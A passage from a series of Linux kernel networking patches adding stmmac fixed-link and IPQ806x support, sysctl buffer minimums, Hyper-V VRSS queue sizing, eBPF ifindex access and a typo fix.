adds the ability to the stmmac driver to detect a fixed-link PHY, instanciate it, and use it during phy_connect(). Fixed link PHYs DT usage is described in: Documentation/devicetree/bindings/net/fixed-link.txt Signed-off-by: Mathieu Olivari Signed-off-by: David S. Miller --- drivers/net/ethernet/stmicro/stmmac/stmmac_main.c | 2 +- .../net/ethernet/stmicro/stmmac/stmmac_platform.c | 12 +++++++++++- 2 files changed, 12 insertions(+), 2 deletions(-) diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c index 31c64169f2ec..c46178cf4d50 100644 --- a/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c +++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_main.c @@ -856,7 +856,7 @@ static int stmmac_init_phy(struct net_device *dev) * device as well. * Note: phydev->phy_id is the result of reading the UID PHY registers. */ - if (phydev->phy_id == 0) { + if (!priv->plat->phy_node && phydev->phy_id == 0) { phy_disconnect(phydev); return -ENODEV; } diff --git a/drivers/net/ethernet/stmicro/stmmac/stmmac_platform.c b/drivers/net/ethernet/stmicro/stmmac/stmmac_platform.c index 8d23155a1a7e..f3918c7e7eeb 100644 --- a/drivers/net/ethernet/stmicro/stmmac/stmmac_platform.c +++ b/drivers/net/ethernet/stmicro/stmmac/stmmac_platform.c @@ -148,6 +148,14 @@ static int stmmac_probe_config_dt(struct platform_device *pdev, /* If we find a phy-handle property, use it as the PHY */ plat->phy_node = of_parse_phandle(np, "phy-handle", 0); + /* If phy-handle is not specified, check if we have a fixed-phy */ + if (!plat->phy_node && of_phy_is_fixed_link(np)) { + if ((of_phy_register_fixed_link(np) < 0)) + return -ENODEV; + + plat->phy_node = of_node_get(np); + } + /* "snps,phy-addr" is not a standard property. Mark it as deprecated * and warn of its use. Remove this when phy node support is added. */ @@ -212,8 +220,10 @@ static int stmmac_probe_config_dt(struct platform_device *pdev, if (of_find_property(np, "snps,pbl", NULL)) { dma_cfg = devm_kzalloc(&pdev->dev, sizeof(*dma_cfg), GFP_KERNEL); - if (!dma_cfg) + if (!dma_cfg) { + of_node_put(np); return -ENOMEM; + } plat->dma_cfg = dma_cfg; of_property_read_u32(np, "snps,pbl", &dma_cfg->pbl); dma_cfg->fixed_burst = From b1c17215d718d8cf7f4443bf3a3033f623affdf1 Mon Sep 17 00:00:00 2001 From: Mathieu Olivari Date: Wed, 27 May 2015 11:02:49 -0700 Subject: [PATCH 484/872] stmmac: add ipq806x glue layer The ethernet controller available in IPQ806x is a Synopsys DesignWare Gigabit MAC IP core, already supported by the stmmac driver. This glue layer implements some platform specific settings required to get the controller working on an IPQ806x based platform. Signed-off-by: Mathieu Olivari Signed-off-by: David S. Miller --- drivers/net/ethernet/stmicro/stmmac/Kconfig | 14 + drivers/net/ethernet/stmicro/stmmac/Makefile | 1 + .../ethernet/stmicro/stmmac/dwmac-ipq806x.c | 365 ++++++++++++++++++ 3 files changed, 380 insertions(+) create mode 100644 drivers/net/ethernet/stmicro/stmmac/dwmac-ipq806x.c diff --git a/drivers/net/ethernet/stmicro/stmmac/Kconfig b/drivers/net/ethernet/stmicro/stmmac/Kconfig index 731e0453a7d4..cec147d1d34f 100644 --- a/drivers/net/ethernet/stmicro/stmmac/Kconfig +++ b/drivers/net/ethernet/stmicro/stmmac/Kconfig @@ -16,6 +16,7 @@ if STMMAC_ETH config STMMAC_PLATFORM tristate "STMMAC Platform bus support" depends on STMMAC_ETH + select MFD_SYSCON default y ---help--- This selects the platform specific bus support for the stmmac driver. @@ -36,6 +37,19 @@ config DWMAC_GENERIC platform specific code to function or is using platform data for setup. +config DWMAC_IPQ806X + tristate "QCA IPQ806x DWMAC support" + default ARCH_QCOM + depends on OF + select MFD_SYSCON + help + Support for QCA IPQ806X DWMAC Ethernet. + + This selects the IPQ806x SoC glue layer support for the stmmac + device driver. This driver does not use any of the hardware + acceleration features available on this SoC. Network devices + will behave like standard non-accelerated ethernet interfaces. + config DWMAC_LPC18XX tristate "NXP LPC18xx/43xx DWMAC support" default ARCH_LPC18XX diff --git a/drivers/net/ethernet/stmicro/stmmac/Makefile b/drivers/net/ethernet/stmicro/stmmac/Makefile index 92e714a48367..b3901616f4f6 100644 --- a/drivers/net/ethernet/stmicro/stmmac/Makefile +++ b/drivers/net/ethernet/stmicro/stmmac/Makefile @@ -6,6 +6,7 @@ stmmac-objs:= stmmac_main.o stmmac_ethtool.o stmmac_mdio.o ring_mode.o \ # Ordering matters. Generic driver must be last. obj-$(CONFIG_STMMAC_PLATFORM) += stmmac-platform.o +obj-$(CONFIG_DWMAC_IPQ806X) += dwmac-ipq806x.o obj-$(CONFIG_DWMAC_LPC18XX) += dwmac-lpc18xx.o obj-$(CONFIG_DWMAC_MESON) += dwmac-meson.o obj-$(CONFIG_DWMAC_ROCKCHIP) += dwmac-rk.o diff --git a/drivers/net/ethernet/stmicro/stmmac/dwmac-ipq806x.c b/drivers/net/ethernet/stmicro/stmmac/dwmac-ipq806x.c new file mode 100644 index 000000000000..7e3129e7f143 --- /dev/null +++ b/drivers/net/ethernet/stmicro/stmmac/dwmac-ipq806x.c @@ -0,0 +1,365 @@ +/* + * Qualcomm Atheros IPQ806x GMAC glue layer + * + * Copyright (C) 2015 The Linux Foundation + * + * Permission to use, copy, modify, and/or distribute this software for any + * purpose with or without fee is hereby granted, provided that the above + * copyright notice and this permission notice appear in all copies. + * + * THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES + * WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF + * MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR + * ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES + * WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN + * ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF + * OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE. + */ + +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include +#include + +#include "stmmac_platform.h" + +#define NSS_COMMON_CLK_GATE 0x8 +#define NSS_COMMON_CLK_GATE_PTP_EN(x) BIT(0x10 + x) +#define NSS_COMMON_CLK_GATE_RGMII_RX_EN(x) BIT(0x9 + (x * 2)) +#define NSS_COMMON_CLK_GATE_RGMII_TX_EN(x) BIT(0x8 + (x * 2)) +#define NSS_COMMON_CLK_GATE_GMII_RX_EN(x) BIT(0x4 + x) +#define NSS_COMMON_CLK_GATE_GMII_TX_EN(x) BIT(0x0 + x) + +#define NSS_COMMON_CLK_DIV0 0xC +#define NSS_COMMON_CLK_DIV_OFFSET(x) (x * 8) +#define NSS_COMMON_CLK_DIV_MASK 0x7f + +#define NSS_COMMON_CLK_SRC_CTRL 0x14 +#define NSS_COMMON_CLK_SRC_CTRL_OFFSET(x) (1 << x) +/* Mode is coded on 1 bit but is different depending on the MAC ID: + * MAC0: QSGMII=0 RGMII=1 + * MAC1: QSGMII=0 SGMII=0 RGMII=1 + * MAC2 & MAC3: QSGMII=0 SGMII=1 + */ +#define NSS_COMMON_CLK_SRC_CTRL_RGMII(x) 1 +#define NSS_COMMON_CLK_SRC_CTRL_SGMII(x) ((x >= 2) ? 1 : 0) + +#define NSS_COMMON_MACSEC_CTL 0x28 +#define NSS_COMMON_MACSEC_CTL_EXT_BYPASS_EN(x) (1 << x) + +#define NSS_COMMON_GMAC_CTL(x) (0x30 + (x * 4)) +#define NSS_COMMON_GMAC_CTL_CSYS_REQ BIT(19) +#define NSS_COMMON_GMAC_CTL_PHY_IFACE_SEL BIT(16) +#define NSS_COMMON_GMAC_CTL_IFG_LIMIT_OFFSET 8 +#define NSS_COMMON_GMAC_CTL_IFG_OFFSET 0 +#define NSS_COMMON_GMAC_CTL_IFG_MASK 0x3f + +#define NSS_COMMON_CLK_DIV_RGMII_1000 1 +#define NSS_COMMON_CLK_DIV_RGMII_100 9 +#define NSS_COMMON_CLK_DIV_RGMII_10 99 +#define NSS_COMMON_CLK_DIV_SGMII_1000 0 +#define NSS_COMMON_CLK_DIV_SGMII_100 4 +#define NSS_COMMON_CLK_DIV_SGMII_10 49 + +#define QSGMII_PCS_MODE_CTL 0x68 +#define QSGMII_PCS_MODE_CTL_AUTONEG_EN(x) BIT((x * 8) + 7) + +#define QSGMII_PCS_CAL_LCKDT_CTL 0x120 +#define QSGMII_PCS_CAL_LCKDT_CTL_RST BIT(19) + +/* Only GMAC1/2/3 support SGMII and their CTL register are not contiguous */ +#define QSGMII_PHY_SGMII_CTL(x) ((x == 1) ? 0x134 : \ + (0x13c + (4 * (x - 2)))) +#define QSGMII_PHY_CDR_EN BIT(0) +#define QSGMII_PHY_RX_FRONT_EN BIT(1) +#define QSGMII_PHY_RX_SIGNAL_DETECT_EN BIT(2) +#define QSGMII_PHY_TX_DRIVER_EN BIT(3) +#define QSGMII_PHY_QSGMII_EN BIT(7) +#define QSGMII_PHY_PHASE_LOOP_GAIN_OFFSET 12 +#define QSGMII_PHY_PHASE_LOOP_GAIN_MASK 0x7 +#define QSGMII_PHY_RX_DC_BIAS_OFFSET 18 +#define QSGMII_PHY_RX_DC_BIAS_MASK 0x3 +#define QSGMII_PHY_RX_INPUT_EQU_OFFSET 20 +#define QSGMII_PHY_RX_INPUT_EQU_MASK 0x3 +#define QSGMII_PHY_CDR_PI_SLEW_OFFSET 22 +#define QSGMII_PHY_CDR_PI_SLEW_MASK 0x3 +#define QSGMII_PHY_TX_DRV_AMP_OFFSET 28 +#define QSGMII_PHY_TX_DRV_AMP_MASK 0xf + +struct ipq806x_gmac { + struct platform_device *pdev; + struct regmap *nss_common; + struct regmap *qsgmii_csr; + uint32_t id; + struct clk *core_clk; + phy_interface_t phy_mode; +}; + +static int get_clk_div_sgmii(struct ipq806x_gmac *gmac, unsigned int speed) +{ + struct device *dev = &gmac->pdev->dev; + int div; + + switch (speed) { + case SPEED_1000: + div = NSS_COMMON_CLK_DIV_SGMII_1000; + break; + + case SPEED_100: + div = NSS_COMMON_CLK_DIV_SGMII_100; + break; + + case SPEED_10: + div = NSS_COMMON_CLK_DIV_SGMII_10; + break; + + default: + dev_err(dev, "Speed %dMbps not supported in SGMII\n", speed); + return -EINVAL; + } + + return div; +} + +static int get_clk_div_rgmii(struct ipq806x_gmac *gmac, unsigned int speed) +{ + struct device *dev = &gmac->pdev->dev; + int div; + + switch (speed) { + case SPEED_1000: + div = NSS_COMMON_CLK_DIV_RGMII_1000; + break; + + case SPEED_100: + div = NSS_COMMON_CLK_DIV_RGMII_100; + break; + + case SPEED_10: + div = NSS_COMMON_CLK_DIV_RGMII_10; + break; + + default: + dev_err(dev, "Speed %dMbps not supported in RGMII\n", speed); + return -EINVAL; + } + + return div; +} + +static int ipq806x_gmac_set_speed(struct ipq806x_gmac *gmac, unsigned int speed) +{ + uint32_t clk_bits, val; + int div; + + switch (gmac->phy_mode) { + case PHY_INTERFACE_MODE_RGMII: + div = get_clk_div_rgmii(gmac, speed); + clk_bits = NSS_COMMON_CLK_GATE_RGMII_RX_EN(gmac->id) | + NSS_COMMON_CLK_GATE_RGMII_TX_EN(gmac->id); + break; + + case PHY_INTERFACE_MODE_SGMII: + div = get_clk_div_sgmii(gmac, speed); + clk_bits = NSS_COMMON_CLK_GATE_GMII_RX_EN(gmac->id) | + NSS_COMMON_CLK_GATE_GMII_TX_EN(gmac->id); + break; + + default: + dev_err(&gmac->pdev->dev, "Unsupported PHY mode: \"%s\"\n", + phy_modes(gmac->phy_mode)); + return -EINVAL; + } + + /* Disable the clocks */ + regmap_read(gmac->nss_common, NSS_COMMON_CLK_GATE, &val); + val &= ~clk_bits; + regmap_write(gmac->nss_common, NSS_COMMON_CLK_GATE, val); + + /* Set the divider */ + regmap_read(gmac->nss_common, NSS_COMMON_CLK_DIV0, &val); + val &= ~(NSS_COMMON_CLK_DIV_MASK + << NSS_COMMON_CLK_DIV_OFFSET(gmac->id)); + val |= div << NSS_COMMON_CLK_DIV_OFFSET(gmac->id); + regmap_write(gmac->nss_common, NSS_COMMON_CLK_DIV0, val); + + /* Enable the clock back */ + regmap_read(gmac->nss_common, NSS_COMMON_CLK_GATE, &val); + val |= clk_bits; + regmap_write(gmac->nss_common, NSS_COMMON_CLK_GATE, val); + + return 0; +} + +static void *ipq806x_gmac_of_parse(struct ipq806x_gmac *gmac) +{ + struct device *dev = &gmac->pdev->dev; + + gmac->phy_mode = of_get_phy_mode(dev->of_node); + if (gmac->phy_mode < 0) { + dev_err(dev, "missing phy mode property\n"); + return ERR_PTR(-EINVAL); + } + + if (of_property_read_u32(dev->of_node, "qcom,id", &gmac->id) < 0) { + dev_err(dev, "missing qcom id property\n"); + return ERR_PTR(-EINVAL); + } + + /* The GMACs are called 1 to 4 in the documentation, but to simplify the + * code and keep it consistent with the Linux convention, we'll number + * them from 0 to 3 here. + */ + if (gmac->id < 0 || gmac->id > 3) { + dev_err(dev, "invalid gmac id\n"); + return ERR_PTR(-EINVAL); + } + + gmac->core_clk = devm_clk_get(dev, "stmmaceth"); + if (IS_ERR(gmac->core_clk)) { + dev_err(dev, "missing stmmaceth clk property\n"); + return gmac->core_clk; + } + clk_set_rate(gmac->core_clk, 266000000); + + /* Setup the register map for the nss common registers */ + gmac->nss_common = syscon_regmap_lookup_by_phandle(dev->of_node, + "qcom,nss-common"); + if (IS_ERR(gmac->nss_common)) { + dev_err(dev, "missing nss-common node\n"); + return gmac->nss_common; + } + + /* Setup the register map for the qsgmii csr registers */ + gmac->qsgmii_csr = syscon_regmap_lookup_by_phandle(dev->of_node, + "qcom,qsgmii-csr"); + if (IS_ERR(gmac->qsgmii_csr)) { + dev_err(dev, "missing qsgmii-csr node\n"); + return gmac->qsgmii_csr; + } + + return NULL; +} + +static void *ipq806x_gmac_setup(struct platform_device *pdev) +{ + struct device *dev = &pdev->dev; + struct ipq806x_gmac *gmac; + int val; + void *err; + + gmac = devm_kzalloc(dev, sizeof(*gmac), GFP_KERNEL); + if (!gmac) + return ERR_PTR(-ENOMEM); + + gmac->pdev = pdev; + + err = ipq806x_gmac_of_parse(gmac); + if (err) { + dev_err(dev, "device tree parsing error\n"); + return err; + } + + regmap_write(gmac->qsgmii_csr, QSGMII_PCS_CAL_LCKDT_CTL, + QSGMII_PCS_CAL_LCKDT_CTL_RST); + + /* Inter frame gap is set to 12 */ + val = 12 << NSS_COMMON_GMAC_CTL_IFG_OFFSET | + 12 << NSS_COMMON_GMAC_CTL_IFG_LIMIT_OFFSET; + /* We also initiate an AXI low power exit request */ + val |= NSS_COMMON_GMAC_CTL_CSYS_REQ; + switch (gmac->phy_mode) { + case PHY_INTERFACE_MODE_RGMII: + val |= NSS_COMMON_GMAC_CTL_PHY_IFACE_SEL; + break; + case PHY_INTERFACE_MODE_SGMII: + val &= ~NSS_COMMON_GMAC_CTL_PHY_IFACE_SEL; + break; + default: + dev_err(&pdev->dev, "Unsupported PHY mode: \"%s\"\n", + phy_modes(gmac->phy_mode)); + return NULL; + } + regmap_write(gmac->nss_common, NSS_COMMON_GMAC_CTL(gmac->id), val); + + /* Configure the clock src according to the mode */ + regmap_read(gmac->nss_common, NSS_COMMON_CLK_SRC_CTRL, &val); + val &= ~NSS_COMMON_CLK_SRC_CTRL_OFFSET(gmac->id); + switch (gmac->phy_mode) { + case PHY_INTERFACE_MODE_RGMII: + val |= NSS_COMMON_CLK_SRC_CTRL_RGMII(gmac->id) << + NSS_COMMON_CLK_SRC_CTRL_OFFSET(gmac->id); + break; + case PHY_INTERFACE_MODE_SGMII: + val |= NSS_COMMON_CLK_SRC_CTRL_SGMII(gmac->id) << + NSS_COMMON_CLK_SRC_CTRL_OFFSET(gmac->id); + break; + default: + dev_err(&pdev->dev, "Unsupported PHY mode: \"%s\"\n", + phy_modes(gmac->phy_mode)); + return NULL; + } + regmap_write(gmac->nss_common, NSS_COMMON_CLK_SRC_CTRL, val); + + /* Enable PTP clock */ + regmap_read(gmac->nss_common, NSS_COMMON_CLK_GATE, &val); + val |= NSS_COMMON_CLK_GATE_PTP_EN(gmac->id); + regmap_write(gmac->nss_common, NSS_COMMON_CLK_GATE, val); + + if (gmac->phy_mode == PHY_INTERFACE_MODE_SGMII) { + regmap_write(gmac->qsgmii_csr, QSGMII_PHY_SGMII_CTL(gmac->id), + QSGMII_PHY_CDR_EN | + QSGMII_PHY_RX_FRONT_EN | + QSGMII_PHY_RX_SIGNAL_DETECT_EN | + QSGMII_PHY_TX_DRIVER_EN | + QSGMII_PHY_QSGMII_EN | + 0x4 << QSGMII_PHY_PHASE_LOOP_GAIN_OFFSET | + 0x3 << QSGMII_PHY_RX_DC_BIAS_OFFSET | + 0x1 << QSGMII_PHY_RX_INPUT_EQU_OFFSET | + 0x2 << QSGMII_PHY_CDR_PI_SLEW_OFFSET | + 0xC << QSGMII_PHY_TX_DRV_AMP_OFFSET); + } + + return gmac; +} + +static void ipq806x_gmac_fix_mac_speed(void *priv, unsigned int speed) +{ + struct ipq806x_gmac *gmac = priv; + + ipq806x_gmac_set_speed(gmac, speed); +} + +static const struct stmmac_of_data ipq806x_gmac_data = { + .has_gmac = 1, + .setup = ipq806x_gmac_setup, + .fix_mac_speed = ipq806x_gmac_fix_mac_speed, +}; + +static const struct of_device_id ipq806x_gmac_dwmac_match[] = { + { .compatible = "qcom,ipq806x-gmac", .data = &ipq806x_gmac_data }, + { } +}; +MODULE_DEVICE_TABLE(of, ipq806x_gmac_dwmac_match); + +static struct platform_driver ipq806x_gmac_dwmac_driver = { + .probe = stmmac_pltfr_probe, + .remove = stmmac_pltfr_remove, + .driver = { + .name = "ipq806x-gmac-dwmac", + .pm = &stmmac_pltfr_pm_ops, + .of_match_table = ipq806x_gmac_dwmac_match, + }, +}; +module_platform_driver(ipq806x_gmac_dwmac_driver); + +MODULE_AUTHOR("Mathieu Olivari "); +MODULE_DESCRIPTION("Qualcomm Atheros IPQ806x DWMAC specific glue layer"); +MODULE_LICENSE("Dual BSD/GPL"); From 95e130af03b103138ae0d188ef012e5994fe970d Mon Sep 17 00:00:00 2001 From: Mathieu Olivari Date: Wed, 27 May 2015 11:02:50 -0700 Subject: [PATCH 485/872] net: stmmac: ipq806x: document device tree bindings Add the device tree bindings documentation for the QCA IPQ806x variant of the Synopsys DesignWare MAC. Signed-off-by: Mathieu Olivari Signed-off-by: David S. Miller --- .../devicetree/bindings/net/ipq806x-dwmac.txt | 35 +++++++++++++++++++ 1 file changed, 35 insertions(+) create mode 100644 Documentation/devicetree/bindings/net/ipq806x-dwmac.txt diff --git a/Documentation/devicetree/bindings/net/ipq806x-dwmac.txt b/Documentation/devicetree/bindings/net/ipq806x-dwmac.txt new file mode 100644 index 000000000000..6d7ab4e524d4 --- /dev/null +++ b/Documentation/devicetree/bindings/net/ipq806x-dwmac.txt @@ -0,0 +1,35 @@ +* IPQ806x DWMAC Ethernet controller + +The device inherits all the properties of the dwmac/stmmac devices +described in the file net/stmmac.txt with the following changes. + +Required properties: + +- compatible: should be "qcom,ipq806x-gmac" along with "snps,dwmac" + and any applicable more detailed version number + described in net/stmmac.txt + +- qcom,nss-common: should contain a phandle to a syscon device mapping the + nss-common registers. + +- qcom,qsgmii-csr: should contain a phandle to a syscon device mapping the + qsgmii-csr registers. + +Example: + + gmac: ethernet@37000000 { + device_type = "network"; + compatible = "qcom,ipq806x-gmac"; + reg = <0x37000000 0x200000>; + interrupts = ; + interrupt-names = "macirq"; + + qcom,nss-common = <&nss_common>; + qcom,qsgmii-csr = <&qsgmii_csr>; + + clocks = <&gcc GMAC_CORE1_CLK>; + clock-names = "stmmaceth"; + + resets = <&gcc GMAC_CORE1_RESET>; + reset-names = "stmmaceth"; + }; From 8133534c760d4083f79d2cde42c636ccc0b2792e Mon Sep 17 00:00:00 2001 From: Sorin Dumitru Date: Wed, 27 May 2015 22:16:49 +0300 Subject: [PATCH 486/872] net: limit tcp/udp rmem/wmem to SOCK_{RCV,SND}BUF_MIN This is similar to b1cb59cf2efe(net: sysctl_net_core: check SNDBUF and RCVBUF for min length). I don't think too small values can cause crashes in the case of udp and tcp, but I've seen this set to too small values which triggered awful performance. It also makes the setting consistent across all the wmem/rmem sysctls. Signed-off-by: Sorin Dumitru Signed-off-by: David S. Miller --- net/ipv4/sysctl_net_ipv4.c | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) diff --git a/net/ipv4/sysctl_net_ipv4.c b/net/ipv4/sysctl_net_ipv4.c index 0330ab2e2b63..433231ccfb17 100644 --- a/net/ipv4/sysctl_net_ipv4.c +++ b/net/ipv4/sysctl_net_ipv4.c @@ -41,6 +41,8 @@ static int tcp_syn_retries_min = 1; static int tcp_syn_retries_max = MAX_TCP_SYNCNT; static int ip_ping_group_range_min[] = { 0, 0 }; static int ip_ping_group_range_max[] = { GID_T_MAX, GID_T_MAX }; +static int min_sndbuf = SOCK_MIN_SNDBUF; +static int min_rcvbuf = SOCK_MIN_RCVBUF; /* Update system visible IP port range */ static void set_local_port_range(struct net *net, int range[2]) @@ -528,7 +530,7 @@ static struct ctl_table ipv4_table[] = { .maxlen = sizeof(sysctl_tcp_wmem), .mode = 0644, .proc_handler = proc_dointvec_minmax, - .extra1 = &one, + .extra1 = &min_sndbuf, }, { .procname = "tcp_notsent_lowat", @@ -543,7 +545,7 @@ static struct ctl_table ipv4_table[] = { .maxlen = sizeof(sysctl_tcp_rmem), .mode = 0644, .proc_handler = proc_dointvec_minmax, - .extra1 = &one, + .extra1 = &min_rcvbuf, }, { .procname = "tcp_app_win", @@ -756,7 +758,7 @@ static struct ctl_table ipv4_table[] = { .maxlen = sizeof(sysctl_udp_rmem_min), .mode = 0644, .proc_handler = proc_dointvec_minmax, - .extra1 = &one + .extra1 = &min_rcvbuf, }, { .procname = "udp_wmem_min", @@ -764,7 +766,7 @@ static struct ctl_table ipv4_table[] = { .maxlen = sizeof(sysctl_udp_wmem_min), .mode = 0644, .proc_handler = proc_dointvec_minmax, - .extra1 = &one + .extra1 = &min_sndbuf, }, { } }; From e01ec2199ef22e2cabd7d6e68a192f3eb728029f Mon Sep 17 00:00:00 2001 From: KY Srinivasan Date: Wed, 27 May 2015 13:16:57 -0700 Subject: [PATCH 487/872] hv_netvsc: Properly size the vrss queues The current algorithm for deciding on the number of VRSS channels is not optimal since we open up the min of number of CPUs online and the number of VRSS channels the host is offering. So on a 32 VCPU guest we could potentially open 32 VRSS subchannels. Experimentation has shown that it is best to limit the number of VRSS channels to the number of CPUs within a NUMA node. Here is the new algorithm for deciding on the number of sub-channels we would open up: 1) Pick the minimum of what the host is offering and what the driver in the guest is specifying as the default value. 2) Pick the minimum of (1) and the numbers of CPUs in the NUMA node the primary channel is bound to. Signed-off-by: K. Y. Srinivasan Signed-off-by: David S. Miller --- drivers/net/hyperv/hyperv_net.h | 1 + drivers/net/hyperv/netvsc_drv.c | 4 ++++ drivers/net/hyperv/rndis_filter.c | 16 ++++++++++++++-- 3 files changed, 19 insertions(+), 2 deletions(-) diff --git a/drivers/net/hyperv/hyperv_net.h b/drivers/net/hyperv/hyperv_net.h index ddcc7f8d22b4..dd4544085db3 100644 --- a/drivers/net/hyperv/hyperv_net.h +++ b/drivers/net/hyperv/hyperv_net.h @@ -161,6 +161,7 @@ struct netvsc_device_info { unsigned char mac_adr[ETH_ALEN]; bool link_state; /* 0 - link up, 1 - link down */ int ring_size; + u32 max_num_vrss_chns; }; enum rndis_device_state { diff --git a/drivers/net/hyperv/netvsc_drv.c b/drivers/net/hyperv/netvsc_drv.c index d9c88bc09f45..358475ed9b59 100644 --- a/drivers/net/hyperv/netvsc_drv.c +++ b/drivers/net/hyperv/netvsc_drv.c @@ -46,6 +46,8 @@ static int ring_size = 128; module_param(ring_size, int, S_IRUGO); MODULE_PARM_DESC(ring_size, "Ring buffer size (# of pages)"); +static int max_num_vrss_chns = 8; + static const u32 default_msg = NETIF_MSG_DRV | NETIF_MSG_PROBE | NETIF_MSG_LINK | NETIF_MSG_IFUP | NETIF_MSG_IFDOWN | NETIF_MSG_RX_ERR | @@ -755,6 +757,7 @@ static int netvsc_change_mtu(struct net_device *ndev, int mtu) ndevctx->device_ctx = hdev; hv_set_drvdata(hdev, ndev); device_info.ring_size = ring_size; + device_info.max_num_vrss_chns = max_num_vrss_chns; rndis_filter_device_add(hdev, &device_info); netif_tx_wake_all_queues(ndev); @@ -975,6 +978,7 @@ static int netvsc_probe(struct hv_device *dev, /* Notify the netvsc driver of the new device */ device_info.ring_size = ring_size; + device_info.max_num_vrss_chns = max_num_vrss_chns; ret = rndis_filter_device_add(dev, &device_info); if (ret != 0) { netdev_err(net, "unable to add netvsc device (ret %d)\n", ret); diff --git a/drivers/net/hyperv/rndis_filter.c b/drivers/net/hyperv/rndis_filter.c index 9118cea91882..006c1b8c2385 100644 --- a/drivers/net/hyperv/rndis_filter.c +++ b/drivers/net/hyperv/rndis_filter.c @@ -1013,6 +1013,9 @@ int rndis_filter_device_add(struct hv_device *dev, struct ndis_recv_scale_cap rsscap; u32 rsscap_size = sizeof(struct ndis_recv_scale_cap); u32 mtu, size; + u32 num_rss_qs; + const struct cpumask *node_cpu_mask; + u32 num_possible_rss_qs; rndis_device = get_rndis_device(); if (!rndis_device) @@ -1100,9 +1103,18 @@ int rndis_filter_device_add(struct hv_device *dev, if (ret || rsscap.num_recv_que < 2) goto out; + num_rss_qs = min(device_info->max_num_vrss_chns, rsscap.num_recv_que); + net_device->max_chn = rsscap.num_recv_que; - net_device->num_chn = (num_online_cpus() < rsscap.num_recv_que) ? - num_online_cpus() : rsscap.num_recv_que; + + /* + * We will limit the VRSS channels to the number CPUs in the NUMA node + * the primary channel is currently bound to. + */ + node_cpu_mask = cpumask_of_node(cpu_to_node(dev->channel->target_cpu)); + num_possible_rss_qs = cpumask_weight(node_cpu_mask); + net_device->num_chn = min(num_possible_rss_qs, num_rss_qs); + if (net_device->num_chn == 1) goto out; From 37e82c2f974b72c9ab49c787ef7b5bb1aec12768 Mon Sep 17 00:00:00 2001 From: Alexei Starovoitov Date: Wed, 27 May 2015 15:30:39 -0700 Subject: [PATCH 488/872] bpf: allow BPF programs access skb->skb_iif and skb->dev->ifindex fields classic BPF already exposes skb->dev->ifindex via SKF_AD_IFINDEX extension. Allow eBPF program to access it as well. Note that classic aborts execution of the program if 'skb->dev == NULL' (which is inconvenient for program writers), whereas eBPF returns zero in such case. Also expose the 'skb_iif' field, since programs triggered by redirected packet need to known the original interface index. Summary: __skb->ifindex -> skb->dev->ifindex __skb->ingress_ifindex -> skb->skb_iif Signed-off-by: Alexei Starovoitov Acked-by: Daniel Borkmann Signed-off-by: David S. Miller --- include/uapi/linux/bpf.h | 2 ++ net/core/filter.c | 18 ++++++++++++++++++ 2 files changed, 20 insertions(+) diff --git a/include/uapi/linux/bpf.h b/include/uapi/linux/bpf.h index f0a9af8b4dae..72f3080afa1e 100644 --- a/include/uapi/linux/bpf.h +++ b/include/uapi/linux/bpf.h @@ -236,6 +236,8 @@ struct __sk_buff { __u32 vlan_tci; __u32 vlan_proto; __u32 priority; + __u32 ingress_ifindex; + __u32 ifindex; }; #endif /* _UAPI__LINUX_BPF_H__ */ diff --git a/net/core/filter.c b/net/core/filter.c index 3adcca6f17a4..2c30d6632d66 100644 --- a/net/core/filter.c +++ b/net/core/filter.c @@ -1499,6 +1499,24 @@ static u32 sk_filter_convert_ctx_access(int dst_reg, int src_reg, int ctx_off, offsetof(struct sk_buff, priority)); break; + case offsetof(struct __sk_buff, ingress_ifindex): + BUILD_BUG_ON(FIELD_SIZEOF(struct sk_buff, skb_iif) != 4); + + *insn++ = BPF_LDX_MEM(BPF_W, dst_reg, src_reg, + offsetof(struct sk_buff, skb_iif)); + break; + + case offsetof(struct __sk_buff, ifindex): + BUILD_BUG_ON(FIELD_SIZEOF(struct net_device, ifindex) != 4); + + *insn++ = BPF_LDX_MEM(bytes_to_bpf_size(FIELD_SIZEOF(struct sk_buff, dev)), + dst_reg, src_reg, + offsetof(struct sk_buff, dev)); + *insn++ = BPF_JMP_IMM(BPF_JEQ, dst_reg, 0, 1); + *insn++ = BPF_LDX_MEM(BPF_W, dst_reg, dst_reg, + offsetof(struct net_device, ifindex)); + break; + case offsetof(struct __sk_buff, mark): return convert_skb_access(SKF_AD_MARK, dst_reg, src_reg, insn); From f4fb874cf076f9eafdd15c0a88cd0f0397b95e43 Mon Sep 17 00:00:00 2001 From: Vivien Didelot Date: Wed, 27 May 2015 21:07:26 -0400 Subject: [PATCH 489/872] if_vlan: fix vlaue -> value typo Fixes "vlaue" for "value" in include/linux/if_vlan.h. Signed-off-by: Vivien Didelot Signed-off-by: David S. Miller --- include/linux/if_vlan.h | 6 +++--- 1 file changed, 3 insertions(+), 3 deletions(-) diff --git a/include/linux/if_vlan.h b/include/linux/if_vlan.h index b9ab677c0c0a..a40d29846ac2 100644 --- a/include/linux/if_vlan.h +++ b/include/linux/if_vlan.h @@ -416,7 +416,7 @@ static inline void __vlan_hwaccel_put_tag(struct sk_buff *skb, /** * __vlan_get_tag - get the VLAN ID that is part of the payload * @skb: skbuff to query - * @vlan_tci: buffer to store vlaue + * @vlan_tci: buffer to store value * * Returns error if the skb is not of VLAN type */ @@ -435,7 +435,7 @@ static inline int __vlan_get_tag(const struct sk_buff *skb, u16 *vlan_tci) /** * __vlan_hwaccel_get_tag - get the VLAN ID that is in @skb->cb[] * @skb: skbuff to query - * @vlan_tci: buffer to store vlaue + * @vlan_tci: buffer to store value * * Returns error if @skb->vlan_tci is not set correctly */ @@ -456,7 +456,7 @@ static inline int __vlan_hwaccel_get_tag(const struct sk_buff *skb, /** * 